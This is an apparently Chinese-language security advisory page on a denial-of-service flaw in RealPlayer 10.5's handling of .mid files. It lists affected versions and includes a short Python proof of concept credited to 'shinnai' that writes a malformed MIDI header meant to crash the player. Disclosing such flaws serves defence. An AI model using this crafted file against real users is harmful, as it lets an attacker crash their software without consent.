RealNetworks RealPlayer是一款流行的媒体播放软件。
RealNetworks RealPlayer处理.mid文件存在安全问题,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。
构建如下的恶意页面,诱使用户使用RealPlayer访问,可导致应用程序崩溃:
print "-----------------------------------------------------------------------"
print "# RealPlayer .mid file Denial of Service"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot[org]"
print "# site: http://shinnai.altervista.org"
print "# based on sehato exploit, see: http://www.milw0rm.com/author/947"
print "-----------------------------------------------------------------------"
fileOut = open('test.mid','wb')
fileOut.write('\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00')
fileOut.close()
Real Networks RealPlayer 10.5 v6.0.12.1235
Real Networks RealPlayer 10.5 v6.0.12.1069
Real Networks RealPlayer 10.5 v6.0.12.1059
Real Networks RealPlayer 10.5 v6.0.12.1056
Real Networks RealPlayer 10.5 v6.0.12.1053
Real Networks RealPlayer 10.5 v6.0.12.1040
Real Networks RealPlayer 10.5 Beta v6.0.12.1016
Real Networks RealPlayer 10.5
Real Networks RealPlayer 10.5
Real Networks RealPlayer 10.5
目前没有详细解决方案提供:
<a href="http://www.real.com/" target="_blank">http://www.real.com/</a>
京公网安备 11010502034610号
暂无评论